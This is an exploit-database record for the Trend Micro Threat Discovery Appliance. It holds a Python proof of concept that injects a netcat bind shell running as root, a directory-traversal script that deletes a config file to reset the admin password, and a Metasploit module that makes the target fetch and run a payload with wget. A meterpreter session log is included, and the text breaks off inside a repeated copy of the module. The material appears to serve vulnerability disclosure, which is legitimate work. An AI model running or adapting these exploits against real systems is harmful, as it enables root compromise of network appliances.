ID PACKETSTORM:142219 Type packetstorm Reporter Roberto Suggi Liverani Modified 2017-04-20T00:00:00
Description
`#!/usr/local/bin/python
"""
Trend Micro Threat Discovery Appliance <= 2.6.1062r1 log_query_dae.cgi Remote Code Execution Vulnerability
Found by: Steven Seeley of Source Incite & Roberto Suggi Liverani - @malerisch - http://blog.malerisch.net/
File: TDA_InstallationCD.2.6.1062r1.en_US.iso
sha1: 8da4604c92a944ba8f7744641bce932df008f9f9
Download: http://downloadcenter.trendmicro.com/index.php?regs=NABU&clk=latest&clkval=1787&lang_loc=1
Summary:
========
There exists a post authenticated command injection vulnerability that can be used to execute arbitrary code as root.
Notes:
======
- Since this is a busybox, getting a connectback seemed hard. So, for this particular PoC, all I did was
exec a bind shell using netcat.
- Auth is VERY weak, no privilege seperation, no username required, no password policy, no protection from bruteforce attempts...
- Auth is now bypassed, please see CVE-2016-7552
Example:
========
saturn:trend_micro_threat_discovery_log_query_dae_rce mr_me$ ./poc.py
(+) usage: ./poc.py <target> <pass>
(+) eg: ./poc.py 172.16.175.123 admin123
saturn:trend_micro_threat_discovery_log_query_dae_rce mr_me$ ./poc.py 172.16.175.123 admin
(+) logged in...
(+) starting backdoor, this will take a few secs...
(+) calling backdoor!
id
uid=0(root) gid=0(root)
uname -a
Linux localhost 2.6.24.4 #1 SMP Wed Oct 13 14:38:44 CST 2010 i686 unknown
"""
import re
import os
import sys
import time
import requests
import threading
# Silence urllib3's certificate warnings: every request below is sent with
# verify=False, i.e. the appliance's TLS certificate is never validated.
requests.packages.urllib3.disable_warnings()
# Exactly two positional arguments are expected: the target host and the
# password. No username is taken anywhere in this script (see the
# "Auth is VERY weak" note in the header).
if len(sys.argv) != 3:
print "(+) usage: %s <target> <pass>" % sys.argv[0]
print "(+) eg: %s 172.16.175.123 admin123" % sys.argv[0]
sys.exit(-1)
t = sys.argv[1]  # target host / IP
p = sys.argv[2]  # password posted to logon.cgi
# All traffic goes over HTTPS to the appliance's cgi-bin interface.
bu = "https://%s/" % t
l_url = "%scgi-bin/logon.cgi" % bu  # authentication endpoint
# Vulnerable endpoint; the record's cvelist and the seebug entry below tie
# log_query_dae.cgi to CVE-2016-8589.
e_url = "%scgi-bin/log_query_dae.cgi" % bu
# One shared Session so that whatever cookie logon.cgi sets is carried over
# to the follow-up request made from the worker thread.
s = requests.Session()
def exec_bd(s, e_url):
# Send the single GET that triggers the command injection.
#
# Args:
#     s: the requests.Session that already holds the login cookie.
#     e_url: base URL of log_query_dae.cgi. The query string is appended to
#         a local copy; the caller's string is left unchanged.
#
# Root cause, from the defender's side: the value of the cache_id query
# parameter evidently reaches a shell unvalidated, so the `|` and backtick
# substitution in it are interpreted by the appliance (as root, per the
# header). The fix is to accept only the expected identifier format for
# cache_id and to stop composing shell command lines from request
# parameters. For detection, cgi-bin requests whose query strings carry
# shell metacharacters are a cheap and high-signal thing to alert on in
# the appliance's web logs.
# now we setup our backdoor
# no reverse, since it seems to fail !?
netcat = "test|`nc -e /bin/sh -lp 1338`"
e_url += "?act=search_advanced&cache_id=%s" % netcat
# NOTE(review): this GET presumably does not return while the injected
# listener is alive, which is why the caller runs it in a thread — confirm.
s.get(e_url, verify=False)
# first we login...
# Only a password is posted (no username field exists in this request);
# any cookie the server sets stays on `s` for the worker thread's request.
r = s.post(l_url, data={ "passwd":p, "isCookieEnable":1 }, verify=False)
# Login success is detected heuristically: the response body mentions
# frame.cgi. Anything else is treated as a failed login.
if "frame.cgi" in r.text:
print "(+) logged in..."
# The injecting GET is issued from a worker thread because it is not
# expected to return while the injected command runs (see exec_bd).
thread = threading.Thread(target=exec_bd, args=(s, e_url,))
thread.start()
print "(+) starting backdoor, this will take a few secs..."
# Fixed delay in place of any readiness check: assumes the server has
# acted on the request within 4 seconds.
time.sleep(4)
print "(+) calling backdoor!"
# Hands the terminal to a local netcat client. `t` is interpolated into a
# shell command line without escaping, so it must be a plain host/IP.
os.system("nc %s 1337" % t)
else:
print "(-) login failed"
sys.exit(-1)
`
{"id": "PACKETSTORM:142219", "type": "packetstorm", "bulletinFamily": "exploit", "title": "Trend Micro Threat Discovery Appliance 2.6.1062r1 log_query_dae.cgi Remote Code Execution", "description": "", "published": "2017-04-20T00:00:00", "modified": "2017-04-20T00:00:00", "cvss": {"vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/", "score": 10.0}, "href": "https://packetstormsecurity.com/files/142219/Trend-Micro-Threat-Discovery-Appliance-2.6.1062r1-log_query_dae.cgi-Remote-Code-Execution.html", "reporter": "Roberto Suggi Liverani", "references": [], "cvelist": ["CVE-2016-7552", "CVE-2016-8589"], "lastseen": "2017-04-20T03:25:31", "viewCount": 25, "enchantments": {"score": {"value": 6.4, "vector": "NONE"}, "dependencies": {"references": [{"type": "checkpoint_advisories", "idList": ["CPAI-2016-1038"]}, {"type": "cve", "idList": ["CVE-2016-7552", "CVE-2016-8589"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT/MULTI/HTTP/TRENDMICRO_THREAT_DISCOVERY_ADMIN_SYS_TIME_CMDI", "MSF:EXPLOIT/MULTI/HTTP/TRENDMICRO_THREAT_DISCOVERY_ADMIN_SYS_TIME_CMDI/"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:142201", "PACKETSTORM:142218", "PACKETSTORM:142225"]}, {"type": "seebug", "idList": ["SSV:92938", "SSV:92940", "SSV:92978", "SSV:92981", "SSV:92985", "SSV:92986"]}, {"type": "zdt", "idList": ["1337DAY-ID-27630", "1337DAY-ID-27635"]}], "rev": 4}, "backreferences": {"references": [{"type": "checkpoint_advisories", "idList": ["CPAI-2016-1038"]}, {"type": "cve", "idList": ["CVE-2016-7552", "CVE-2016-8589"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT/MULTI/HTTP/TRENDMICRO_THREAT_DISCOVERY_ADMIN_SYS_TIME_CMDI"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:142201", "PACKETSTORM:142218", "PACKETSTORM:142225"]}, {"type": "seebug", "idList": ["SSV:92938", "SSV:92940", "SSV:92978", "SSV:92981", "SSV:92985", "SSV:92986"]}, {"type": "zdt", "idList": ["1337DAY-ID-27630"]}]}, "exploitation": null, "vulnersScore": 6.4}, "sourceHref": 
"https://packetstormsecurity.com/files/download/142219/tmtda261062rlllqd-exec.txt", "sourceData": "`#!/usr/local/bin/python \n\"\"\" \nTrend Micro Threat Discovery Appliance <= 2.6.1062r1 log_query_dae.cgi Remote Code Execution Vulnerability \nFound by: Steven Seeley of Source Incite & Roberto Suggi Liverani - @malerisch - http://blog.malerisch.net/ \nFile: TDA_InstallationCD.2.6.1062r1.en_US.iso \nsha1: 8da4604c92a944ba8f7744641bce932df008f9f9 \nDownload: http://downloadcenter.trendmicro.com/index.php?regs=NABU&clk=latest&clkval=1787&lang_loc=1 \n \nSummary: \n======== \n \nThere exists a post authenticated command injection vulnerability that can be used to execute arbitrary code as root. \n \nNotes: \n====== \n \n- Since this is a busybox, getting a connectback seemed hard. So, for this particular PoC, all I did was \nexec a bind shell using netcat. \n \n- Auth is VERY weak, no privilege seperation, no username required, no password policy, no protection from bruteforce attempts... \n- Auth is now bypassed, please see CVE-2016-7552 \n \nExample: \n======== \n \nsaturn:trend_micro_threat_discovery_log_query_dae_rce mr_me$ ./poc.py \n(+) usage: ./poc.py <target> <pass> \n(+) eg: ./poc.py 172.16.175.123 admin123 \nsaturn:trend_micro_threat_discovery_log_query_dae_rce mr_me$ ./poc.py 172.16.175.123 admin \n(+) logged in... \n(+) starting backdoor, this will take a few secs... \n(+) calling backdoor! 
\nid \nuid=0(root) gid=0(root) \nuname -a \nLinux localhost 2.6.24.4 #1 SMP Wed Oct 13 14:38:44 CST 2010 i686 unknown \n\"\"\" \n \nimport re \nimport os \nimport sys \nimport time \nimport requests \nimport threading \n \nrequests.packages.urllib3.disable_warnings() \n \nif len(sys.argv) != 3: \nprint \"(+) usage: %s <target> <pass>\" % sys.argv[0] \nprint \"(+) eg: %s 172.16.175.123 admin123\" % sys.argv[0] \nsys.exit(-1) \n \nt = sys.argv[1] \np = sys.argv[2] \n \nbu = \"https://%s/\" % t \nl_url = \"%scgi-bin/logon.cgi\" % bu \ne_url = \"%scgi-bin/log_query_dae.cgi\" % bu \n \ns = requests.Session() \n \ndef exec_bd(s, e_url): \n# now we setup our backdoor \n# no reverse, since it seems to fail !? \nnetcat = \"test|`nc -e /bin/sh -lp 1338`\" \ne_url += \"?act=search_advanced&cache_id=%s\" % netcat \ns.get(e_url, verify=False) \n \n# first we login... \nr = s.post(l_url, data={ \"passwd\":p, \"isCookieEnable\":1 }, verify=False) \nif \"frame.cgi\" in r.text: \nprint \"(+) logged in...\" \nthread = threading.Thread(target=exec_bd, args=(s, e_url,)) \nthread.start() \nprint \"(+) starting backdoor, this will take a few secs...\" \ntime.sleep(4) \nprint \"(+) calling backdoor!\" \nos.system(\"nc %s 1337\" % t) \nelse: \nprint \"(-) login failed\" \nsys.exit(-1) \n \n`\n", "immutableFields": [], "cvss2": {}, "cvss3": {}, "_state": {"dependencies": 1645377242}}
{"seebug": [{"lastseen": "2017-11-19T11:59:33", "description": "Summary:\r\n\r\n\r\nThere exists a post authenticated command injection vulnerability that can be used to execute arbitrary code as root.\r\n\r\nNotes:\r\n\r\n\r\n- Since this is a busybox, getting a connectback seemed hard. So, for this particular PoC, all I did was \r\nexec a bind shell using netcat.\r\n- Auth is VERY weak, no privilege seperation, no username required, no password policy, no protection from bruteforce attempts...\r\n- Auth is now bypassed, please see CVE-2016-7552\r\n\r\nExample:\r\n\r\n```\r\nsaturn:trend_micro_threat_discovery_log_query_dae_rce mr_me$ ./poc.py \r\n(+) usage: ./poc.py <target> <pass>\r\n(+) eg: ./poc.py 172.16.175.123 admin123\r\nsaturn:trend_micro_threat_discovery_log_query_dae_rce mr_me$ ./poc.py 172.16.175.123 admin\r\n(+) logged in...\r\n(+) starting backdoor, this will take a few secs...\r\n(+) calling backdoor!\r\nid\r\nuid=0(root) gid=0(root)\r\nuname -a\r\nLinux localhost 2.6.24.4 #1 SMP Wed Oct 13 14:38:44 CST 2010 i686 unknown\r\n```", "published": "2017-04-21T00:00:00", "type": "seebug", "title": "Trend Micro Threat Discovery Appliance <= 2.6.1062r1 log_query_dae.cgi Command Injection Remote Code Execution Vulnerability (CVE-2016-8589)", "bulletinFamily": "exploit", "cvelist": ["CVE-2016-7552", "CVE-2016-8589"], "modified": "2017-04-21T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-92985", "id": "SSV:92985", "sourceData": "\n import re\r\nimport os\r\nimport sys\r\nimport time\r\nimport requests\r\nimport threading\r\n\r\nrequests.packages.urllib3.disable_warnings()\r\n\r\nif len(sys.argv) != 3:\r\n print \"(+) usage: %s <target> <pass>\" % sys.argv[0]\r\n print \"(+) eg: %s 172.16.175.123 admin123\" % sys.argv[0]\r\n sys.exit(-1)\r\n\r\nt = sys.argv[1]\r\np = sys.argv[2]\r\n\r\nbu = \"https://%s/\" % t\r\nl_url = \"%scgi-bin/logon.cgi\" % bu\r\ne_url = \"%scgi-bin/log_query_dae.cgi\" % bu\r\n\r\ns = requests.Session()\r\n\r\ndef exec_bd(s, 
e_url):\r\n # now we setup our backdoor\r\n # no reverse, since it seems to fail !?\r\n netcat = \"test|`nc -e /bin/sh -lp 1338`\"\r\n e_url += \"?act=search_advanced&cache_id=%s\" % netcat\r\n s.get(e_url, verify=False)\r\n\r\n# first we login...\r\nr = s.post(l_url, data={ \"passwd\":p, \"isCookieEnable\":1 }, verify=False)\r\nif \"frame.cgi\" in r.text:\r\n print \"(+) logged in...\"\r\n thread = threading.Thread(target=exec_bd, args=(s, e_url,))\r\n thread.start()\r\n print \"(+) starting backdoor, this will take a few secs...\"\r\n time.sleep(4)\r\n print \"(+) calling backdoor!\"\r\n os.system(\"nc %s 1337\" % t)\r\nelse:\r\n print \"(-) login failed\"\r\n sys.exit(-1)\n ", "sourceHref": "https://www.seebug.org/vuldb/ssvid-92985", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2017-11-19T11:59:35", "description": "#### Summary:\r\n\r\nThere exists a pre-authenticated directory traversal vulnerability that allows an attacker to delete any folder or file as root. \r\nThis can result in an attacker causing a DoS or bypassing authentication.\r\n\r\n#### Exploitation:\r\n\r\nAn attacker can use this vulnerability to bypass the authentication by reseting the default password back to 'admin'.\r\n1. Delete the config file /opt/TrendMicro/MinorityReport/etc/igsa.conf\r\n2. Wait for the server to be rebooted...\r\nIt is highly likely the server will be rebooted because the deletion of the config file causes a DoS condition whereby\r\nno-body can even login... 
(since the md5 hashed pw is stored in the config file).\r\nNotes:\r\n======\r\n- (Un)fortunately, we were not able to find a pre-authenticated way to reboot the server, hence requiring slight user interaction (or patience)\r\n- No username required!\r\n\r\n#### Example:\r\n\r\n```\r\nsaturn:trend_micro_threat_discovery_logoff_auth_bypass mr_me$ ./poc.py \r\n(+) usage: ./poc.py <target> <option [reset][login]>\r\n(+) eg: ./poc.py 172.16.175.123 reset\r\n(+) eg: ./poc.py 172.16.175.123 login\r\nsaturn:trend_micro_threat_discovery_logoff_auth_bypass mr_me$ ./poc.py 172.16.175.123 login\r\n(-) login failed\r\nsaturn:trend_micro_threat_discovery_logoff_auth_bypass mr_me$ ./poc.py 172.16.175.123 reset\r\n(+) resetting the default password...\r\n(+) success! now wait for a reboot...\r\nsaturn:trend_micro_threat_discovery_logoff_auth_bypass mr_me$ ./poc.py 172.16.175.123 login\r\n(+) logged in...\r\n(+) authenticated session_id: de685c4feec6d698f8165a8af8489df1\r\n```", "published": "2017-04-21T00:00:00", "type": "seebug", "title": "Trend Micro Threat Discovery Appliance <= 2.6.1062r1 logoff.cgi Directory Traversal Authentication Bypass Vulnerability\uff08CVE-2016-7552\uff09", "bulletinFamily": "exploit", "cvelist": ["CVE-2016-7552"], "modified": "2017-04-21T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-92981", "id": "SSV:92981", "sourceData": "\n import re\r\nimport os\r\nimport sys\r\nimport time\r\nimport requests\r\nimport threading\r\n\r\nrequests.packages.urllib3.disable_warnings()\r\n\r\nif len(sys.argv) != 3:\r\n print \"(+) usage: %s <target> <option [reset][login]>\" % sys.argv[0]\r\n print \"(+) eg: %s 172.16.175.123 reset\" % sys.argv[0]\r\n print \"(+) eg: %s 172.16.175.123 login\" % sys.argv[0]\r\n sys.exit(-1)\r\n\r\nt = sys.argv[1]\r\no = sys.argv[2]\r\n\r\nbu = \"https://%s/\" % t\r\nl_url = \"%scgi-bin/logon.cgi\" % bu\r\no_url = \"%scgi-bin/logoff.cgi\" % bu\r\n\r\nif o.lower() == \"login\":\r\n # default password\r\n r = requests.post(l_url, 
data={ \"passwd\":\"admin\", \"isCookieEnable\":1 }, verify=False)\r\n if \"frame.cgi\" in r.text:\r\n print \"(+) logged in...\"\r\n match = re.search(\"session_id=(.*); path\", r.headers['set-cookie'])\r\n if match:\r\n print \"(+) authenticated session_id: %s\" % match.group(1)\r\n else:\r\n print \"(-) login failed\"\r\nelif o.lower() == \"reset\":\r\n print \"(+) resetting the default password...\"\r\n r = requests.get(o_url, cookies={\"session_id\":\"../../../opt/TrendMicro/MinorityReport/etc/igsa.conf\"}, verify=False)\r\n # causes an uninitialized free() vulnerability as well...\r\n if \"Memory map\" in r.text:\r\n print \"(+) success! now wait for a reboot...\"\r\nelse:\r\n print \"(-) not a valid option!\"\n ", "sourceHref": "https://www.seebug.org/vuldb/ssvid-92981", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2017-11-19T11:59:56", "description": "A file delete in the logoff.cgi interface that allows for an authentication bypass (CVE-2016-7552).\r\nA command injection in the admin_sys_time.cgi interface that allows for an attacker to gain remote code execution (CVE-2016-7547).\r\n\r\nTrend Micro are not patching this vulnerability since this product is now ([EOL](https://success.trendmicro.com/solution/1105727-list-of-end-of-life-eol-end-of-support-eos-trend-micro-products)).\r\n\r\n#### Installation\r\n\r\nList the steps needed to make sure this thing works\r\n\r\n* Download the ISO from (Trend Micro's) download site.\r\n* Setup the VM to have 2 NIC's, 100 Gig HD and 4096 RAM.\r\n* Click through the default install.\r\n* You are ready to burn.\r\n\r\n#### Verification\r\n\r\nList the steps needed to make sure this thing works\r\n\r\n* Start msfconsole\r\n* use exploit/multi/http/trendmicro_threat_discovery_admin_sys_time_cmdi\r\n* set payload linux/x86/meterpreter/reverse_tcp\r\n* set RHOST XXX.XXX.XXX.XXX\r\n* set LHOST XXX.XXX.XXX.XXX\r\n* check\r\n* Verify that the target is 
vulnerable.\r\n* exploit\r\n* The exploit will reset the admin password, now reboot the VM.\r\n* Verify that you have rebooted the VM and that you receive a shell.", "cvss3": {}, "published": "2017-04-12T00:00:00", "type": "seebug", "title": "Trend Micro Threat Discovery Appliance arbitrary files deletion (CVE-2016-7552)", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2016-7547", "CVE-2016-7552"], "modified": "2017-04-12T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-92938", "id": "SSV:92938", "sourceData": "\n ##\r\n# This module requires Metasploit: http://metasploit.com/download\r\n# Current source: https://github.com/rapid7/metasploit-framework\r\n##\r\n\r\nrequire 'msf/core'\r\n\r\nclass MetasploitModule < Msf::Exploit::Remote\r\n Rank = ExcellentRanking\r\n\r\n include Msf::Exploit::Remote::HttpClient\r\n include Msf::Exploit::Remote::HttpServer\r\n include Msf::Exploit::EXE\r\n include Msf::Exploit::FileDropper\r\n\r\n def initialize(info = {})\r\n super(update_info(info,\r\n 'Name' => 'Trend Micro Threat Discovery Appliance admin_sys_time.cgi Remote Command Execution',\r\n 'Description' => %q{\r\n This module exploits two vulnerabilities the Trend Micro Threat Discovery Appliance.\r\n The first is an authentication bypass vulnerability via a file delete in logoff.cgi\r\n which resets the admin password back to 'admin' upon a reboot (CVE-2016-7552). \r\n The second is a cmdi flaw using the timezone parameter in the admin_sys_time.cgi \r\n interface (CVE-2016-7547). You have the option to use the authentication bypass or \r\n not since it requires that the server is rebooted. 
This module has been tested on \r\n version 2.6.1062r1 of the appliance.\r\n },\r\n 'Author' =>\r\n [\r\n 'mr_me <steventhomasseeley@gmail.com>', # vuln + msf\r\n 'Roberto Suggi Liverani @malerisch', # vuln + msf\r\n ],\r\n 'License' => MSF_LICENSE,\r\n 'References' =>\r\n [\r\n [ 'URL', 'https://asciinema.org/a/112480'], # demo\r\n [ 'CVE', '2016-7552'], # auth bypass\r\n [ 'CVE', '2016-7547'], # cmdi\r\n ],\r\n 'Platform' => 'linux',\r\n 'Arch' => ARCH_X86,\r\n 'Privileged' => true,\r\n 'Payload' =>\r\n {\r\n 'DisableNops' => true,\r\n },\r\n 'Targets' =>\r\n [\r\n [ 'Trend Micro Threat Discovery Appliance 2.6.1062r1', {} ]\r\n ],\r\n 'DefaultOptions' =>\r\n {\r\n 'SSL' => true\r\n },\r\n 'DefaultTarget' => 0,\r\n 'DisclosureDate' => 'Apr 10 2017'))\r\n\r\n register_options(\r\n [\r\n Opt::RPORT(443),\r\n OptString.new('TARGETURI', [true, 'The target URI', '/']),\r\n OptString.new('PASSWORD', [true, 'The password to authenticate with', 'admin']),\r\n OptPort.new('SRVPORT', [ true, 'The daemon port to listen on', 1337 ]),\r\n OptBool.new('AUTHBYPASS', [ true, 'Bypass the authentication', true ]),\r\n\r\n ], self.class)\r\n end\r\n\r\n def check\r\n if do_login\r\n res = send_request_cgi({\r\n 'uri' => normalize_uri(target_uri.path, 'cgi-bin/about.cgi'),\r\n 'cookie' => @cookie,\r\n 'method' => 'GET',\r\n }, 1)\r\n if res and res.code == 200 and res.body =~ /About Trend Micro/\r\n version = \"#{$1}\" if res.body =~ /var ver_str = new String\\(\"(.*)\"\\)/\r\n case version\r\n when /2.6.1062/\r\n return Exploit::CheckCode::Vulnerable\r\n end\r\n end\r\n end\r\n return Exploit::CheckCode::Safe\r\n end\r\n\r\n def exploit\r\n if datastore['AUTHBYPASS']\r\n print_status(\"Bypassing authentication...\")\r\n if reset_password\r\n print_good(\"The password has been reset!\")\r\n print_status(\"Waiting for the reboot...\")\r\n pwn_after_reboot\r\n end\r\n else\r\n if do_login\r\n pwn\r\n else\r\n fail_with(Failure::NoAccess, \"Authentication failed\")\r\n end\r\n end\r\n 
end\r\n\r\n def reset_password\r\n c = \"session_id=../../../opt/TrendMicro/MinorityReport/etc/igsa.conf\"\r\n res = send_request_cgi({\r\n 'uri' => normalize_uri(target_uri.path, 'cgi-bin/logoff.cgi'),\r\n 'method' => 'GET',\r\n 'cookie' => c,\r\n })\r\n\r\n if res and res.code == 200 and res.headers.to_s =~ /Backtrace/\r\n return true\r\n end\r\n return false\r\n end\r\n\r\n def pwn\r\n start_http_server\r\n print_good(\"Logged in\")\r\n download_exec\r\n end\r\n\r\n def pwn_after_reboot\r\n @rebooted = false\r\n while !@rebooted\r\n if do_login\r\n @rebooted = true\r\n pwn\r\n end\r\n end\r\n end\r\n\r\n def on_request_uri(cli, request)\r\n if (not @pl)\r\n print_error(\"#{rhost}:#{rport} - A request came in, but the payload wasn't ready yet!\")\r\n return\r\n end\r\n print_status(\"#{rhost}:#{rport} - Sending the payload to the server...\")\r\n @elf_sent = true\r\n send_response(cli, @pl)\r\n end\r\n\r\n def start_http_server\r\n @pl = generate_payload_exe\r\n @elf_sent = false\r\n\r\n downfile = rand_text_alpha(8+rand(8))\r\n resource_uri = '/' + downfile\r\n\r\n # do not use SSL for the attacking web server\r\n if datastore['SSL']\r\n ssl_restore = true\r\n datastore['SSL'] = false\r\n end\r\n\r\n if (datastore['SRVHOST'] == \"0.0.0.0\" or datastore['SRVHOST'] == \"::\")\r\n srv_host = datastore['URIHOST'] || Rex::Socket.source_address(rhost)\r\n else\r\n srv_host = datastore['SRVHOST']\r\n end\r\n\r\n @service_url = 'http://' + srv_host + ':' + datastore['SRVPORT'].to_s + resource_uri\r\n service_url_payload = srv_host + resource_uri\r\n\r\n print_status(\"#{rhost}:#{rport} - Starting up our web service on #{@service_url} ...\")\r\n start_service({'Uri' => {\r\n 'Proc' => Proc.new { |cli, req|\r\n on_request_uri(cli, req)\r\n },\r\n 'Path' => resource_uri\r\n }})\r\n\r\n datastore['SSL'] = true if ssl_restore\r\n connect\r\n end\r\n\r\n def exec(cmd)\r\n send_request_cgi({\r\n 'uri' => normalize_uri(target_uri.path, 'cgi-bin/admin_sys_time.cgi'),\r\n 
'cookie' => @cookie,\r\n 'method' => 'POST',\r\n 'vars_post' => {\r\n 'act' => 'save',\r\n 'timezone' => cmd,\r\n }\r\n }, 1)\r\n end\r\n\r\n def download_exec\r\n @bd = rand_text_alpha(8+rand(8))\r\n register_file_for_cleanup(\"/tmp/#{@bd}\")\r\n exec(\"|`wget #{@service_url} -O /tmp/#{@bd}`\")\r\n exec(\"|`chmod 755 /tmp/#{@bd}`\")\r\n exec(\"|`/tmp/#{@bd}`\")\r\n\r\n # we need to delay, for the stager\r\n select(nil, nil, nil, 5)\r\n end\r\n\r\n def do_login\r\n\r\n begin\r\n login = send_request_cgi({\r\n 'uri' => normalize_uri(target_uri.path, 'cgi-bin/logon.cgi'),\r\n 'method' => 'POST',\r\n 'vars_post' => {\r\n 'passwd' => datastore['PASSWORD'],\r\n 'isCookieEnable' => 1,\r\n }\r\n })\r\n\r\n # these are needed due to the reboot\r\n rescue Rex::ConnectionRefused\r\n return false\r\n rescue Rex::ConnectionTimeout\r\n return false\r\n end\r\n if login and login.code == 200 and login.body =~ /frame\\.cgi/\r\n @cookie = \"session_id=#{$1};\" if login.get_cookies =~ /session_id=(.*);/\r\n return true\r\n end\r\n return false\r\n end\r\nend\r\n=begin\r\nsaturn:metasploit-framework mr_me$ ./msfconsole -qr scripts/trend.rc \r\n[*] Processing scripts/trend.rc for ERB directives.\r\nresource (scripts/trend.rc)> use exploit/multi/http/trendmicro_threat_discovery_admin_sys_time_cmdi\r\nresource (scripts/trend.rc)> set RHOST 192.168.100.2\r\nRHOST => 192.168.100.2\r\nresource (scripts/trend.rc)> set payload linux/x86/meterpreter/reverse_tcp\r\npayload => linux/x86/meterpreter/reverse_tcp\r\nresource (scripts/trend.rc)> set LHOST 192.168.100.13\r\nLHOST => 192.168.100.13\r\nresource (scripts/trend.rc)> exploit\r\n[*] Exploit running as background job.\r\n[*] Started reverse TCP handler on 192.168.100.13:4444 \r\n[*] Bypassing authentication...\r\nmsf exploit(trendmicro_threat_discovery_admin_sys_time_cmdi) > \r\n[+] The password has been reset!\r\n[*] Waiting for the reboot...\r\n[*] 192.168.100.2:443 - Starting up our web service on 
http://192.168.100.13:1337/nnDBuOUMuKnxP ...\r\n[*] Using URL: http://0.0.0.0:1337/nnDBuOUMuKnxP\r\n[*] Local IP: http://192.168.100.13:1337/nnDBuOUMuKnxP\r\n[+] Logged in\r\n[*] 192.168.100.2:443 - Sending the payload to the server...\r\n[*] Transmitting intermediate stager for over-sized stage...(105 bytes)\r\n[*] Sending stage (1495599 bytes) to 192.168.100.2\r\n[*] Meterpreter session 1 opened (192.168.100.13:4444 -> 192.168.100.2:46140) at 2016-09-23 14:59:08 -0500\r\n[+] Deleted /tmp/rpNDXQZTB\r\n[*] Server stopped.\r\nmsf exploit(trendmicro_threat_discovery_admin_sys_time_cmdi) > sessions -i 1\r\n[*] Starting interaction with 1...\r\nmeterpreter > shell\r\nProcess 3846 created.\r\nChannel 1 created.\r\nBusyBox v1.00 (2010.10.13-06:52+0000) Built-in shell (ash)\r\nEnter 'help' for a list of built-in commands.\r\n/bin/sh: can't access tty; job control turned off\r\n/opt/TrendMicro/MinorityReport/www/cgi-bin # id\r\nid\r\nuid=0(root) gid=0(root)\r\n/opt/TrendMicro/MinorityReport/www/cgi-bin #\r\n=end\n ", "sourceHref": "https://www.seebug.org/vuldb/ssvid-92938", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2017-11-19T12:00:06", "description": "A command injection in the admin_sys_time. 
the cgi interface that allows for an attacker to gain remote code execution (CVE-2016-7547).\n\nVulnerability linkage: https://www.seebug.org/vuldb/ssvid-92938\n", "published": "2017-04-12T00:00:00", "type": "seebug", "title": "Trend Micro Threat Discovery Appliance remote code execution\uff08CVE-2016-7547\uff09", "bulletinFamily": "exploit", "cvelist": ["CVE-2016-7547", "CVE-2016-7552"], "modified": "2017-04-12T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-92940", "id": "SSV:92940", "sourceData": "\n ##\r\n# This module requires Metasploit: http://metasploit.com/download\r\n# Current source: https://github.com/rapid7/metasploit-framework\r\n##\r\n\r\nrequire 'msf/core'\r\n\r\nclass MetasploitModule < Msf::Exploit::Remote\r\n Rank = ExcellentRanking\r\n\r\n include Msf::Exploit::Remote::HttpClient\r\n include Msf::Exploit::Remote::HttpServer\r\n include Msf::Exploit::EXE\r\n include Msf::Exploit::FileDropper\r\n\r\n def initialize(info = {})\r\n super(update_info(info,\r\n 'Name' => 'Trend Micro Threat Discovery Appliance admin_sys_time.cgi Remote Command Execution',\r\n 'Description' => %q{\r\n This module exploits two vulnerabilities the Trend Micro Threat Discovery Appliance.\r\n The first is an authentication bypass vulnerability via a file delete in logoff.cgi\r\n which resets the admin password back to 'admin' upon a reboot (CVE-2016-7552). \r\n The second is a cmdi flaw using the timezone parameter in the admin_sys_time.cgi \r\n interface (CVE-2016-7547). You have the option to use the authentication bypass or \r\n not since it requires that the server is rebooted. 
This module has been tested on \r\n version 2.6.1062r1 of the appliance.\r\n },\r\n 'Author' =>\r\n [\r\n 'mr_me <steventhomasseeley@gmail.com>', # vuln + msf\r\n 'Roberto Suggi Liverani @malerisch', # vuln + msf\r\n ],\r\n 'License' => MSF_LICENSE,\r\n 'References' =>\r\n [\r\n [ 'URL', 'https://asciinema.org/a/112480'], # demo\r\n [ 'CVE', '2016-7552'], # auth bypass\r\n [ 'CVE', '2016-7547'], # cmdi\r\n ],\r\n 'Platform' => 'linux',\r\n 'Arch' => ARCH_X86,\r\n 'Privileged' => true,\r\n 'Payload' =>\r\n {\r\n 'DisableNops' => true,\r\n },\r\n 'Targets' =>\r\n [\r\n [ 'Trend Micro Threat Discovery Appliance 2.6.1062r1', {} ]\r\n ],\r\n 'DefaultOptions' =>\r\n {\r\n 'SSL' => true\r\n },\r\n 'DefaultTarget' => 0,\r\n 'DisclosureDate' => 'Apr 10 2017'))\r\n\r\n register_options(\r\n [\r\n Opt::RPORT(443),\r\n OptString.new('TARGETURI', [true, 'The target URI', '/']),\r\n OptString.new('PASSWORD', [true, 'The password to authenticate with', 'admin']),\r\n OptPort.new('SRVPORT', [ true, 'The daemon port to listen on', 1337 ]),\r\n OptBool.new('AUTHBYPASS', [ true, 'Bypass the authentication', true ]),\r\n\r\n ], self.class)\r\n end\r\n\r\n def check\r\n if do_login\r\n res = send_request_cgi({\r\n 'uri' => normalize_uri(target_uri.path, 'cgi-bin/about.cgi'),\r\n 'cookie' => @cookie,\r\n 'method' => 'GET',\r\n }, 1)\r\n if res and res.code == 200 and res.body =~ /About Trend Micro/\r\n version = \"#{$1}\" if res.body =~ /var ver_str = new String\\(\"(.*)\"\\)/\r\n case version\r\n when /2.6.1062/\r\n return Exploit::CheckCode::Vulnerable\r\n end\r\n end\r\n end\r\n return Exploit::CheckCode::Safe\r\n end\r\n\r\n def exploit\r\n if datastore['AUTHBYPASS']\r\n print_status(\"Bypassing authentication...\")\r\n if reset_password\r\n print_good(\"The password has been reset!\")\r\n 